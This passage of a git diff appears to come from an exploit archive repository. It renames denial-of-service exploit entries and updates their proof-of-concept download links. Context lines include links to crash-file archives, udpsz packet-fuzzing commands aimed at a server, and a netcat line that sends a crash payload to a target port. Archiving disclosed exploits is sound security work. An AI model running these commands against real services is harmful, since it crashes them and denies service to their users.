to exploits/multiple/dos/1390.c diff --git a/platforms/multiple/dos/14012.txt b/exploits/multiple/dos/14012.txt similarity index 100% rename from platforms/multiple/dos/14012.txt rename to exploits/multiple/dos/14012.txt diff --git a/platforms/multiple/dos/14121.c b/exploits/multiple/dos/14121.c similarity index 100% rename from platforms/multiple/dos/14121.c rename to exploits/multiple/dos/14121.c diff --git a/platforms/multiple/dos/14185.py b/exploits/multiple/dos/14185.py similarity index 100% rename from platforms/multiple/dos/14185.py rename to exploits/multiple/dos/14185.py diff --git a/platforms/multiple/dos/14268.txt b/exploits/multiple/dos/14268.txt similarity index 93% rename from platforms/multiple/dos/14268.txt rename to exploits/multiple/dos/14268.txt index f51d9a7da..baef73c42 100644 --- a/platforms/multiple/dos/14268.txt +++ b/exploits/multiple/dos/14268.txt @@ -69,7 +69,7 @@ Multi-Computer Virtual Whiteboard and so on. http://aluigi.org/poc/qtsslame.zip or -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14268.zip (qtsslame.zip) +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/14268.zip (qtsslame.zip) ####################################################################### diff --git a/platforms/multiple/dos/14367.txt b/exploits/multiple/dos/14367.txt similarity index 100% rename from platforms/multiple/dos/14367.txt rename to exploits/multiple/dos/14367.txt diff --git a/platforms/multiple/dos/14379.txt b/exploits/multiple/dos/14379.txt similarity index 100% rename from platforms/multiple/dos/14379.txt rename to exploits/multiple/dos/14379.txt diff --git a/platforms/multiple/dos/14422.c b/exploits/multiple/dos/14422.c similarity index 100% rename from platforms/multiple/dos/14422.c rename to exploits/multiple/dos/14422.c diff --git a/platforms/multiple/dos/14537.txt b/exploits/multiple/dos/14537.txt similarity index 100% rename from platforms/multiple/dos/14537.txt rename to exploits/multiple/dos/14537.txt diff --git a/platforms/multiple/dos/146.c b/exploits/multiple/dos/146.c similarity index 100% rename from platforms/multiple/dos/146.c rename to exploits/multiple/dos/146.c diff --git a/platforms/multiple/dos/14761.txt b/exploits/multiple/dos/14761.txt similarity index 91% rename from platforms/multiple/dos/14761.txt rename to exploits/multiple/dos/14761.txt index dfd3e8366..f1ad751fc 100644 --- a/platforms/multiple/dos/14761.txt +++ b/exploits/multiple/dos/14761.txt @@ -9,7 +9,7 @@ Website : http://www.itsecteam.com Forum : http://forum.ITSecTeam.com --------------------------------------------------------------------------- Advisory URL: http://itsecteam.com/en/papers/paper11.htm -POC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14761.zip (adb_poc.zip) +POC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/14761.zip (adb_poc.zip) --------------------------------------------------------------------------- System Affected: Adobe Acrobat reader 7.x diff --git a/platforms/multiple/dos/1483.pl b/exploits/multiple/dos/1483.pl similarity index 100% rename from platforms/multiple/dos/1483.pl rename to exploits/multiple/dos/1483.pl diff --git a/platforms/multiple/dos/1489.pl b/exploits/multiple/dos/1489.pl similarity index 100% rename from platforms/multiple/dos/1489.pl rename to exploits/multiple/dos/1489.pl diff --git a/platforms/multiple/dos/15086.py b/exploits/multiple/dos/15086.py similarity index 96% rename from platforms/multiple/dos/15086.py rename to exploits/multiple/dos/15086.py index f491f5651..4518c0545 100755 --- a/platforms/multiple/dos/15086.py +++ b/exploits/multiple/dos/15086.py @@ -7,7 +7,7 @@ |_| |_|\____/_/ \_\____/|____/ http://www.exploit-db.com/moaub-23-adobe-acrobat-and-reader-newfunction-remote-code-execution-vulnerability/ -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15086.zip (moaub-23-exploit.zip) +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/15086.zip (moaub-23-exploit.zip) ''' ''' diff --git a/platforms/multiple/dos/15215.txt b/exploits/multiple/dos/15215.txt similarity index 96% rename from platforms/multiple/dos/15215.txt rename to exploits/multiple/dos/15215.txt index a75b466c9..fe0efbfef 100644 --- a/platforms/multiple/dos/15215.txt +++ b/exploits/multiple/dos/15215.txt @@ -284,7 +284,7 @@ With similar PoC we can try attack ftp.adobe.com, ftp.openbsd.org etc. 0day remote ftpd Denial-of-Service: http://cxib.net/stuff/glob-0day.c -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15215.c (glob-0day.c) +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/15215.c (glob-0day.c) - --- 3. Fix --- Oracle 25.09.2010 CET: Being fixed in main codeline diff --git a/platforms/multiple/dos/15261.txt b/exploits/multiple/dos/15261.txt similarity index 94% rename from platforms/multiple/dos/15261.txt rename to exploits/multiple/dos/15261.txt index 86ce5f5ea..d48f1d4cf 100644 --- a/platforms/multiple/dos/15261.txt +++ b/exploits/multiple/dos/15261.txt @@ -64,7 +64,7 @@ The effects of the problem can be: http://aluigi.org/poc/soliddb_1.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15261.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/15261.zip ####################################################################### diff --git a/platforms/multiple/dos/15273.txt b/exploits/multiple/dos/15273.txt similarity index 100% rename from platforms/multiple/dos/15273.txt rename to exploits/multiple/dos/15273.txt diff --git a/platforms/multiple/dos/15341.html b/exploits/multiple/dos/15341.html similarity index 100% rename from platforms/multiple/dos/15341.html rename to exploits/multiple/dos/15341.html diff --git a/platforms/multiple/dos/15342.html b/exploits/multiple/dos/15342.html similarity index 100% rename from platforms/multiple/dos/15342.html rename to exploits/multiple/dos/15342.html diff --git a/platforms/multiple/dos/15346.c b/exploits/multiple/dos/15346.c similarity index 100% rename from platforms/multiple/dos/15346.c rename to exploits/multiple/dos/15346.c diff --git a/platforms/multiple/dos/15428.rb b/exploits/multiple/dos/15428.rb similarity index 100% rename from platforms/multiple/dos/15428.rb rename to exploits/multiple/dos/15428.rb diff --git a/platforms/multiple/dos/15467.txt b/exploits/multiple/dos/15467.txt similarity index 100% rename from platforms/multiple/dos/15467.txt rename to exploits/multiple/dos/15467.txt diff --git a/platforms/multiple/dos/15474.txt b/exploits/multiple/dos/15474.txt similarity index 100% rename from platforms/multiple/dos/15474.txt rename to exploits/multiple/dos/15474.txt diff --git a/platforms/multiple/dos/15476.php b/exploits/multiple/dos/15476.php similarity index 100% rename from platforms/multiple/dos/15476.php rename to exploits/multiple/dos/15476.php diff --git a/platforms/multiple/dos/15498.html b/exploits/multiple/dos/15498.html similarity index 100% rename from platforms/multiple/dos/15498.html rename to exploits/multiple/dos/15498.html diff --git a/platforms/multiple/dos/15558.html b/exploits/multiple/dos/15558.html similarity index 100% rename from platforms/multiple/dos/15558.html rename to exploits/multiple/dos/15558.html diff --git a/platforms/multiple/dos/15676.txt b/exploits/multiple/dos/15676.txt similarity index 89% rename from platforms/multiple/dos/15676.txt rename to exploits/multiple/dos/15676.txt index 66306c203..3d39b5615 100644 --- a/platforms/multiple/dos/15676.txt +++ b/exploits/multiple/dos/15676.txt @@ -6,4 +6,4 @@ Exploiting this issue may allow attackers to crash the application and deny serv This issue affects Wireshark 1.2.0 through 1.2.12 and 1.4.0 through 1.4.1. -PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15676-pcap.zip \ No newline at end of file +PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/15676-pcap.zip \ No newline at end of file diff --git a/platforms/multiple/dos/15707.txt b/exploits/multiple/dos/15707.txt similarity index 95% rename from platforms/multiple/dos/15707.txt rename to exploits/multiple/dos/15707.txt index 76f8b5fca..7f0d67bfa 100644 --- a/platforms/multiple/dos/15707.txt +++ b/exploits/multiple/dos/15707.txt @@ -93,7 +93,7 @@ memory location: http://aluigi.org/testz/udpsz.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15707.zip (udpsz.zip) +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/15707.zip (udpsz.zip) udpsz -C "00004b14 00000000 00000001 00000000 0001 0000" -b 0x61 -T SERVER 9001 0x4b18 diff --git a/platforms/multiple/dos/1572.pl b/exploits/multiple/dos/1572.pl similarity index 100% rename from platforms/multiple/dos/1572.pl rename to exploits/multiple/dos/1572.pl diff --git a/platforms/multiple/dos/15722.txt b/exploits/multiple/dos/15722.txt similarity index 100% rename from platforms/multiple/dos/15722.txt rename to exploits/multiple/dos/15722.txt diff --git a/platforms/multiple/dos/15898.py b/exploits/multiple/dos/15898.py similarity index 100% rename from platforms/multiple/dos/15898.py rename to exploits/multiple/dos/15898.py diff --git a/platforms/multiple/dos/15973.txt b/exploits/multiple/dos/15973.txt similarity index 88% rename from platforms/multiple/dos/15973.txt rename to exploits/multiple/dos/15973.txt index dfbdccc29..97fabaf66 100644 --- a/platforms/multiple/dos/15973.txt +++ b/exploits/multiple/dos/15973.txt @@ -6,4 +6,4 @@ Attackers can exploit this issue to cause the application to enter an infinite l Wireshark 1.4.0 to 1.4.1 are vulnerable. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15973.pcap (44986.pcap) \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/15973.pcap (44986.pcap) \ No newline at end of file diff --git a/platforms/multiple/dos/16079.html b/exploits/multiple/dos/16079.html similarity index 100% rename from platforms/multiple/dos/16079.html rename to exploits/multiple/dos/16079.html diff --git a/platforms/multiple/dos/16108.txt b/exploits/multiple/dos/16108.txt similarity index 100% rename from platforms/multiple/dos/16108.txt rename to exploits/multiple/dos/16108.txt diff --git a/platforms/multiple/dos/1622.pl b/exploits/multiple/dos/1622.pl similarity index 100% rename from platforms/multiple/dos/1622.pl rename to exploits/multiple/dos/1622.pl diff --git a/platforms/multiple/dos/16261.txt b/exploits/multiple/dos/16261.txt similarity index 96% rename from platforms/multiple/dos/16261.txt rename to exploits/multiple/dos/16261.txt index 9d7d70bb7..36982f7bb 100644 --- a/platforms/multiple/dos/16261.txt +++ b/exploits/multiple/dos/16261.txt @@ -147,4 +147,4 @@ n/a -- Luca Carettoni -PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/16261.zip \ No newline at end of file +PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/16261.zip \ No newline at end of file diff --git a/platforms/multiple/dos/1667.html b/exploits/multiple/dos/1667.html similarity index 100% rename from platforms/multiple/dos/1667.html rename to exploits/multiple/dos/1667.html diff --git a/platforms/multiple/dos/1671.c b/exploits/multiple/dos/1671.c similarity index 100% rename from platforms/multiple/dos/1671.c rename to exploits/multiple/dos/1671.c diff --git a/platforms/multiple/dos/16939.txt b/exploits/multiple/dos/16939.txt similarity index 100% rename from platforms/multiple/dos/16939.txt rename to exploits/multiple/dos/16939.txt diff --git a/platforms/multiple/dos/170.c b/exploits/multiple/dos/170.c similarity index 100% rename from platforms/multiple/dos/170.c rename to exploits/multiple/dos/170.c diff --git a/platforms/multiple/dos/1709.txt b/exploits/multiple/dos/1709.txt similarity index 90% rename from platforms/multiple/dos/1709.txt rename to exploits/multiple/dos/1709.txt index 7baf3454e..10174073b 100644 --- a/platforms/multiple/dos/1709.txt +++ b/exploits/multiple/dos/1709.txt @@ -18,4 +18,4 @@ Author: Luigi Auriemma ####################################################################### -Backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1709.zip (04232006-openttdx.zip) \ No newline at end of file +Backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/1709.zip (04232006-openttdx.zip) \ No newline at end of file diff --git a/platforms/multiple/dos/17120.c b/exploits/multiple/dos/17120.c similarity index 100% rename from platforms/multiple/dos/17120.c rename to exploits/multiple/dos/17120.c diff --git a/platforms/multiple/dos/17140.txt b/exploits/multiple/dos/17140.txt similarity index 100% rename from platforms/multiple/dos/17140.txt rename to exploits/multiple/dos/17140.txt diff --git a/platforms/multiple/dos/1716.html b/exploits/multiple/dos/1716.html similarity index 100% rename from platforms/multiple/dos/1716.html rename to exploits/multiple/dos/1716.html diff --git a/platforms/multiple/dos/17201.php b/exploits/multiple/dos/17201.php similarity index 95% rename from platforms/multiple/dos/17201.php rename to exploits/multiple/dos/17201.php index 243eff648..233177c3b 100644 --- a/platforms/multiple/dos/17201.php +++ b/exploits/multiple/dos/17201.php @@ -46,4 +46,4 @@ $phar = new Phar(dirname(__FILE__) . '/poc.phar.tar'); ?> -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17201.phar.tar (poc.phar.tar) \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/17201.phar.tar (poc.phar.tar) \ No newline at end of file diff --git a/platforms/multiple/dos/17549.txt b/exploits/multiple/dos/17549.txt similarity index 100% rename from platforms/multiple/dos/17549.txt rename to exploits/multiple/dos/17549.txt diff --git a/platforms/multiple/dos/17610.py b/exploits/multiple/dos/17610.py similarity index 100% rename from platforms/multiple/dos/17610.py rename to exploits/multiple/dos/17610.py diff --git a/platforms/multiple/dos/17696.pl b/exploits/multiple/dos/17696.pl similarity index 100% rename from platforms/multiple/dos/17696.pl rename to exploits/multiple/dos/17696.pl diff --git a/platforms/multiple/dos/1801.txt b/exploits/multiple/dos/1801.txt similarity index 70% rename from platforms/multiple/dos/1801.txt rename to exploits/multiple/dos/1801.txt index 747fb29e0..7d87f5be8 100644 --- a/platforms/multiple/dos/1801.txt +++ b/exploits/multiple/dos/1801.txt @@ -1,5 +1,5 @@ # libextractor <= 0.5.13 Multiple Heap Overflow PoC Exploits -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1801.zip (05172006-libextho.zip) +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/1801.zip (05172006-libextho.zip) # milw0rm.com [2006-05-17] \ No newline at end of file diff --git a/platforms/multiple/dos/1802.html b/exploits/multiple/dos/1802.html similarity index 100% rename from platforms/multiple/dos/1802.html rename to exploits/multiple/dos/1802.html diff --git a/platforms/multiple/dos/18025.txt b/exploits/multiple/dos/18025.txt similarity index 100% rename from platforms/multiple/dos/18025.txt rename to exploits/multiple/dos/18025.txt diff --git a/platforms/multiple/dos/18116.html b/exploits/multiple/dos/18116.html similarity index 100% rename from platforms/multiple/dos/18116.html rename to exploits/multiple/dos/18116.html diff --git a/platforms/multiple/dos/1819.txt b/exploits/multiple/dos/1819.txt similarity index 100% rename from platforms/multiple/dos/1819.txt rename to exploits/multiple/dos/1819.txt diff --git a/platforms/multiple/dos/1820.txt b/exploits/multiple/dos/1820.txt similarity index 72% rename from platforms/multiple/dos/1820.txt rename to exploits/multiple/dos/1820.txt index 87806256e..73e6d873c 100644 --- a/platforms/multiple/dos/1820.txt +++ b/exploits/multiple/dos/1820.txt @@ -1,5 +1,5 @@ # netPanzer 0.8 rev 952 (frameNum) Server Terminiation Exploit -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1820.zip (05232006-panza.zip) +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/1820.zip (05232006-panza.zip) # milw0rm.com [2006-05-23] \ No newline at end of file diff --git a/platforms/multiple/dos/18370.txt b/exploits/multiple/dos/18370.txt similarity index 100% rename from platforms/multiple/dos/18370.txt rename to exploits/multiple/dos/18370.txt diff --git a/platforms/multiple/dos/18600.txt b/exploits/multiple/dos/18600.txt similarity index 95% rename from platforms/multiple/dos/18600.txt rename to exploits/multiple/dos/18600.txt index 293110dd1..981b37a27 100644 --- a/platforms/multiple/dos/18600.txt +++ b/exploits/multiple/dos/18600.txt @@ -104,7 +104,7 @@ bytes. http://aluigi.org/testz/udpsz.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18600.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/18600.zip A] udpsz -T -C "00000100 ffff0200" 0 -b a -C "00 00 1000000000000000 00" -1 SERVER 2502 8+0x02ffff diff --git a/platforms/multiple/dos/18601.txt b/exploits/multiple/dos/18601.txt similarity index 96% rename from platforms/multiple/dos/18601.txt rename to exploits/multiple/dos/18601.txt index 2aef43be4..d7aaabb3d 100644 --- a/platforms/multiple/dos/18601.txt +++ b/exploits/multiple/dos/18601.txt @@ -101,7 +101,7 @@ again. http://aluigi.org/poc/nsrexecd_1.dat -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18601.dat +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/18601.dat nc SERVER PORT < nsrexecd_1.dat diff --git a/platforms/multiple/dos/18665.py b/exploits/multiple/dos/18665.py similarity index 100% rename from platforms/multiple/dos/18665.py rename to exploits/multiple/dos/18665.py diff --git a/platforms/multiple/dos/1867.html b/exploits/multiple/dos/1867.html similarity index 100% rename from platforms/multiple/dos/1867.html rename to exploits/multiple/dos/1867.html diff --git a/platforms/multiple/dos/18754.php b/exploits/multiple/dos/18754.php similarity index 100% rename from platforms/multiple/dos/18754.php rename to exploits/multiple/dos/18754.php diff --git a/platforms/multiple/dos/18756.txt b/exploits/multiple/dos/18756.txt similarity index 100% rename from platforms/multiple/dos/18756.txt rename to exploits/multiple/dos/18756.txt diff --git a/platforms/multiple/dos/18758.txt b/exploits/multiple/dos/18758.txt similarity index 89% rename from platforms/multiple/dos/18758.txt rename to exploits/multiple/dos/18758.txt index 2557c8cb8..5fd8df973 100644 --- a/platforms/multiple/dos/18758.txt +++ b/exploits/multiple/dos/18758.txt @@ -9,4 +9,4 @@ The following Wireshark versions are vulnerable: 1.4.0 through 1.4.11 1.6.0 through 1.6.5 -PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18758.pcap \ No newline at end of file +PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/18758.pcap \ No newline at end of file diff --git a/platforms/multiple/dos/18877.txt b/exploits/multiple/dos/18877.txt similarity index 96% rename from platforms/multiple/dos/18877.txt rename to exploits/multiple/dos/18877.txt index d9279d51a..eafa52acb 100644 --- a/platforms/multiple/dos/18877.txt +++ b/exploits/multiple/dos/18877.txt @@ -94,7 +94,7 @@ INCREMENT SYSAM_LICENSE_SERVER SYBASE 2.0 permanent 1 ISSUER="Sybase, \ http://aluigi.org/testz/udpsz.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18877.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/18877.zip udpsz -D -T -C "2f 24 189d 4000 0000 0000 00000000 00000000 0000" -b 0x61 SERVER 27000 0x4000 diff --git a/platforms/multiple/dos/18890.txt b/exploits/multiple/dos/18890.txt similarity index 87% rename from platforms/multiple/dos/18890.txt rename to exploits/multiple/dos/18890.txt index 2ea41e0e0..c178a9d7f 100644 --- a/platforms/multiple/dos/18890.txt +++ b/exploits/multiple/dos/18890.txt @@ -8,8 +8,8 @@ some PoC codes which are now available online: http://www.agarri.fr/docs/batik-evil.svg http://www.agarri.fr/docs/batik-evil.jar -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18890.svg -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18890.jar +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/18890.svg +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/18890.jar I published a more detailed article on my blog: http://www.agarri.fr/blog/ diff --git a/platforms/multiple/dos/18918.txt b/exploits/multiple/dos/18918.txt similarity index 89% rename from platforms/multiple/dos/18918.txt rename to exploits/multiple/dos/18918.txt index 24827c468..669b77063 100644 --- a/platforms/multiple/dos/18918.txt +++ b/exploits/multiple/dos/18918.txt @@ -7,4 +7,4 @@ Successful exploits may allow attacker to crash the affected application, denyin Wireshark 1.4.0 to 1.4.12 and 1.6.0 to 1.6.7 are vulnerable. PoC: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18918.pcap \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/18918.pcap \ No newline at end of file diff --git a/platforms/multiple/dos/18919.txt b/exploits/multiple/dos/18919.txt similarity index 71% rename from platforms/multiple/dos/18919.txt rename to exploits/multiple/dos/18919.txt index 98a1fc650..71e399b36 100644 --- a/platforms/multiple/dos/18919.txt +++ b/exploits/multiple/dos/18919.txt @@ -7,11 +7,11 @@ An attacker can exploit these issues to crash the affected application, denying Wireshark versions 1.6.0 through 1.6.7 and versions 1.4.0 through 1.4.12 are vulnerable. PoC: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18919-1.pcap -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18919-2.pcap -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18919-3.pcap -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18919-4.pcap -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18919-5.pcap -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18919-6.pcap -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18919-7.pcap -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18919-8.pcap \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/18919-1.pcap +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/18919-2.pcap +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/18919-3.pcap +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/18919-4.pcap +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/18919-5.pcap +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/18919-6.pcap +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/18919-7.pcap +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/18919-8.pcap \ No newline at end of file diff --git a/platforms/multiple/dos/18920.txt b/exploits/multiple/dos/18920.txt similarity index 89% rename from platforms/multiple/dos/18920.txt rename to exploits/multiple/dos/18920.txt index 0538fd8fc..854d908f2 100644 --- a/platforms/multiple/dos/18920.txt +++ b/exploits/multiple/dos/18920.txt @@ -7,4 +7,4 @@ An attacker can exploit this issue to crash the affected application, denying se Wireshark versions 1.6.0 through 1.6.7 and versions 1.4.0 through 1.4.12 are vulnerable. PoC: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18920.pcap \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/18920.pcap \ No newline at end of file diff --git a/platforms/multiple/dos/19098.txt b/exploits/multiple/dos/19098.txt similarity index 100% rename from platforms/multiple/dos/19098.txt rename to exploits/multiple/dos/19098.txt diff --git a/platforms/multiple/dos/19212.txt b/exploits/multiple/dos/19212.txt similarity index 100% rename from platforms/multiple/dos/19212.txt rename to exploits/multiple/dos/19212.txt diff --git a/platforms/multiple/dos/19225.txt b/exploits/multiple/dos/19225.txt similarity index 100% rename from platforms/multiple/dos/19225.txt rename to exploits/multiple/dos/19225.txt diff --git a/platforms/multiple/dos/19228.pl b/exploits/multiple/dos/19228.pl similarity index 100% rename from platforms/multiple/dos/19228.pl rename to exploits/multiple/dos/19228.pl diff --git a/platforms/multiple/dos/19230.txt b/exploits/multiple/dos/19230.txt similarity index 100% rename from platforms/multiple/dos/19230.txt rename to exploits/multiple/dos/19230.txt diff --git a/platforms/multiple/dos/19290.txt b/exploits/multiple/dos/19290.txt similarity index 100% rename from platforms/multiple/dos/19290.txt rename to exploits/multiple/dos/19290.txt diff --git a/platforms/multiple/dos/19368.sh b/exploits/multiple/dos/19368.sh similarity index 100% rename from platforms/multiple/dos/19368.sh rename to exploits/multiple/dos/19368.sh diff --git a/platforms/multiple/dos/1937.html b/exploits/multiple/dos/1937.html similarity index 100% rename from platforms/multiple/dos/1937.html rename to exploits/multiple/dos/1937.html diff --git a/platforms/multiple/dos/19377.txt b/exploits/multiple/dos/19377.txt similarity index 100% rename from platforms/multiple/dos/19377.txt rename to exploits/multiple/dos/19377.txt diff --git a/platforms/multiple/dos/19378.txt b/exploits/multiple/dos/19378.txt similarity index 100% rename from platforms/multiple/dos/19378.txt rename to exploits/multiple/dos/19378.txt diff --git a/platforms/multiple/dos/19379.txt b/exploits/multiple/dos/19379.txt similarity index 100% rename from platforms/multiple/dos/19379.txt rename to exploits/multiple/dos/19379.txt diff --git a/platforms/multiple/dos/19380.txt b/exploits/multiple/dos/19380.txt similarity index 88% rename from platforms/multiple/dos/19380.txt rename to exploits/multiple/dos/19380.txt index 03d45d138..650ce331f 100644 --- a/platforms/multiple/dos/19380.txt +++ b/exploits/multiple/dos/19380.txt @@ -9,4 +9,4 @@ Where glob1 is 3000 characters. Marc Maiffret has released the following exploit: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19380.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/19380.zip \ No newline at end of file diff --git a/platforms/multiple/dos/19382.txt b/exploits/multiple/dos/19382.txt similarity index 100% rename from platforms/multiple/dos/19382.txt rename to exploits/multiple/dos/19382.txt diff --git a/platforms/multiple/dos/19446.pl b/exploits/multiple/dos/19446.pl similarity index 100% rename from platforms/multiple/dos/19446.pl rename to exploits/multiple/dos/19446.pl diff --git a/platforms/multiple/dos/19457.txt b/exploits/multiple/dos/19457.txt similarity index 100% rename from platforms/multiple/dos/19457.txt rename to exploits/multiple/dos/19457.txt diff --git a/platforms/multiple/dos/1947.c b/exploits/multiple/dos/1947.c similarity index 100% rename from platforms/multiple/dos/1947.c rename to exploits/multiple/dos/1947.c diff --git a/platforms/multiple/dos/19482.txt b/exploits/multiple/dos/19482.txt similarity index 96% rename from platforms/multiple/dos/19482.txt rename to exploits/multiple/dos/19482.txt index c9e2f9ffb..801c454b3 100644 --- a/platforms/multiple/dos/19482.txt +++ b/exploits/multiple/dos/19482.txt @@ -17,7 +17,7 @@ http://www.reactionpenetrationtesting.co.uk/FIT-file-handling-DoS.html PoC file is available here: http://www.reactionpenetrationtesting.co.uk/vuln.fit -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19482.fit +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/19482.fit Affected Products diff --git a/platforms/multiple/dos/19536.txt b/exploits/multiple/dos/19536.txt similarity index 100% rename from platforms/multiple/dos/19536.txt rename to exploits/multiple/dos/19536.txt diff --git a/platforms/multiple/dos/19571.c b/exploits/multiple/dos/19571.c similarity index 100% rename from platforms/multiple/dos/19571.c rename to exploits/multiple/dos/19571.c diff --git a/platforms/multiple/dos/1972.txt b/exploits/multiple/dos/1972.txt similarity index 100% rename from platforms/multiple/dos/1972.txt rename to exploits/multiple/dos/1972.txt diff --git a/platforms/multiple/dos/19750.sh b/exploits/multiple/dos/19750.sh similarity index 100% rename from platforms/multiple/dos/19750.sh rename to exploits/multiple/dos/19750.sh diff --git a/platforms/multiple/dos/19780.txt b/exploits/multiple/dos/19780.txt similarity index 96% rename from platforms/multiple/dos/19780.txt rename to exploits/multiple/dos/19780.txt index 1d8cfb475..685f7a01e 100644 --- a/platforms/multiple/dos/19780.txt +++ b/exploits/multiple/dos/19780.txt @@ -26,9 +26,9 @@ cgiRqCfg.exe provides to the client configuration settings which will disable sc cgiOnStart.exe will need to be put on the attacking webserver as the client expects it. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19780-1.exe +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/19780-1.exe -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19780-2.exe +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/19780-2.exe this script will replay the request to the client, and may be launched from any machine. Modify for your installation and desired client response. @@ -46,4 +46,4 @@ sleep 5 Trend Micro Officescan Denial of Service (tmosdos.zip) was contributed by Marc Ruef . This tool is a pre-compiled Windows binary with Visual Basic source. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19780-3.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/19780-3.zip \ No newline at end of file diff --git a/platforms/multiple/dos/19920.c b/exploits/multiple/dos/19920.c similarity index 100% rename from platforms/multiple/dos/19920.c rename to exploits/multiple/dos/19920.c diff --git a/platforms/multiple/dos/19965.txt b/exploits/multiple/dos/19965.txt similarity index 100% rename from platforms/multiple/dos/19965.txt rename to exploits/multiple/dos/19965.txt diff --git a/platforms/multiple/dos/19977.txt b/exploits/multiple/dos/19977.txt similarity index 100% rename from platforms/multiple/dos/19977.txt rename to exploits/multiple/dos/19977.txt diff --git a/platforms/multiple/dos/19984.c b/exploits/multiple/dos/19984.c similarity index 100% rename from platforms/multiple/dos/19984.c rename to exploits/multiple/dos/19984.c diff --git a/platforms/multiple/dos/19996.txt b/exploits/multiple/dos/19996.txt similarity index 100% rename from platforms/multiple/dos/19996.txt rename to exploits/multiple/dos/19996.txt diff --git a/platforms/multiple/dos/20052.txt b/exploits/multiple/dos/20052.txt similarity index 86% rename from platforms/multiple/dos/20052.txt rename to exploits/multiple/dos/20052.txt index 44940eaa5..a7217c855 100644 --- a/platforms/multiple/dos/20052.txt +++ b/exploits/multiple/dos/20052.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/1421/info If an E-mail containing an excessively long To: field in the header (~1.5 MB) is processed by First Class Intranet Services (FCIS), a Denial of Service can occur. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20052.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/20052.tar.gz \ No newline at end of file diff --git a/platforms/multiple/dos/20098.txt b/exploits/multiple/dos/20098.txt similarity index 97% rename from 